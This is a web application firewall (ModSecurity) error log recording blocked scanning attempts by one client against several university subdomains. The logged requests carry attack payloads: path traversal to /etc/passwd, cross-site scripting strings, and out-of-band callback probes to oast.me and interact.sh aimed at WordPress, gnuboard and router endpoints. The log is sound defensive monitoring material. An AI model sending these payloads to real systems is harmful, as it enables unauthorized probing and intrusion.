[Tue Aug 29 11:55:08.545230 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16LMCo-f0AAAqSwoUAAAAN"]
[Tue Aug 29 11:55:08.574585 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16LMCo-f0AAAqRzJsAAAAM"]
[Tue Aug 29 11:55:08.577171 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16LMCo-f0AAApa-MAAAAAg"]
[Tue Aug 29 11:55:08.577184 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16LMCo-f0AAApbUcgAAAAh"]
[Tue Aug 29 11:55:08.592143 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' accesskey='x' onclick='alert(document.domain)' class='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16LMCo-f0AAAqSwoYAAAAN"]
[Tue Aug 29 11:55:08.603284 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16LMCo-f0AAAqTvoMAAAAa"]
[Tue Aug 29 11:55:09.592829 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16LcCo-f0AAAqsV3AAAAAB"]
[Tue Aug 29 11:55:11.675338 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:arr_ajax_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: gnuboard<svg found within ARGS:arr_ajax_msg: gnuboard<svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/plugin/sms5/ajax.sms_emoticon.php"] [unique_id "ZO16L8Co-f0AAAqSwo4AAAAN"]
[Tue Aug 29 11:55:11.879765 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:arr_ajax_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: gnuboard<svg found within ARGS:arr_ajax_msg: gnuboard<svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugin/sms5/ajax.sms_emoticon.php"] [unique_id "ZO16L8Co-f0AAApOdh8AAAAL"]
[Tue Aug 29 11:55:11.926515 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/wp-admin"] [unique_id "ZO16L8Co-f0AAApbUdMAAAAh"]
[Tue Aug 29 11:55:11.927713 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:arr_ajax_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: gnuboard<svg found within ARGS:arr_ajax_msg: gnuboard<svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/plugin/sms5/ajax.sms_emoticon.php"] [unique_id "ZO16L8Co-f0AAAqsV30AAAAB"]
[Tue Aug 29 11:55:11.928855 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:arr_ajax_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: gnuboard<svg found within ARGS:arr_ajax_msg: gnuboard<svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/plugin/sms5/ajax.sms_emoticon.php"] [unique_id "ZO16L8Co-f0AAAqY6AQAAAAr"]
[Tue Aug 29 11:55:11.929131 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:arr_ajax_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: gnuboard<svg found within ARGS:arr_ajax_msg: gnuboard<svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/plugin/sms5/ajax.sms_emoticon.php"] [unique_id "ZO16L8Co-f0AAApOdiAAAAAL"]
[Tue Aug 29 11:55:12.532663 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/wp-admin"] [unique_id "ZO16MMCo-f0AAAqsV34AAAAB"]
[Tue Aug 29 11:55:12.534591 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/wp-admin"] [unique_id "ZO16MMCo-f0AAApbUdQAAAAh"]
[Tue Aug 29 11:55:12.538548 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin"] [unique_id "ZO16MMCo-f0AAApHReoAAAAP"]
[Tue Aug 29 11:55:12.538642 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin"] [unique_id "ZO16MMCo-f0AAAqeFR8AAAAx"]
[Tue Aug 29 11:55:12.588313 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/email_passthrough.php"] [unique_id "ZO16MMCo-f0AAApHResAAAAP"]
[Tue Aug 29 11:55:12.606347 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/email_passthrough.php"] [unique_id "ZO16MMCo-f0AAApbUdYAAAAh"]
[Tue Aug 29 11:55:12.611173 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:arr_ajax_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: gnuboard<svg found within ARGS:arr_ajax_msg: gnuboard<svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/plugin/sms5/ajax.sms_emoticon.php"] [unique_id "ZO16MMCo-f0AAAqSwpUAAAAN"]
[Tue Aug 29 11:55:12.626960 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/email_passthrough.php"] [unique_id "ZO16MMCo-f0AAAqeFSIAAAAx"]
[Tue Aug 29 11:55:12.647421 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/email_passthrough.php"] [unique_id "ZO16MMCo-f0AAApa-NIAAAAg"]
[Tue Aug 29 11:55:12.648259 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/email_passthrough.php"] [unique_id "ZO16MMCo-f0AAAqeFSMAAAAx"]
[Tue Aug 29 11:55:12.666021 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/wp-admin"] [unique_id "ZO16MMCo-f0AAApOdiUAAAAL"]
[Tue Aug 29 11:55:13.549959 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/email_passthrough.php"] [unique_id "ZO16McCo-f0AAAqqtbwAAAAA"]
[Tue Aug 29 11:55:14.555467 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/boafrm/formWlanRedirect"] [unique_id "ZO16MsCo-f0AAApXgnYAAAAU"]
[Tue Aug 29 11:55:14.557216 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/boafrm/formWlanRedirect"] [unique_id "ZO16MsCo-f0AAApOdioAAAAL"]
[Tue Aug 29 11:55:14.559818 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/boafrm/formWlanRedirect"] [unique_id "ZO16MsCo-f0AAAqY6A0AAAAr"]
[Tue Aug 29 11:55:14.588531 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/boafrm/formWlanRedirect"] [unique_id "ZO16MsCo-f0AAAqsV4IAAAAB"]
[Tue Aug 29 11:55:14.652136 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/boafrm/formWlanRedirect"] [unique_id "ZO16MsCo-f0AAAqqtcMAAAAA"]
[Tue Aug 29 11:55:14.685177 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:form_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:form_id: xxxxxx\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16MsCo-f0AAApbUeEAAAAh"]
[Tue Aug 29 11:55:14.690148 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:form_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:form_id: xxxxxx\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16MsCo-f0AAApOdi8AAAAL"]
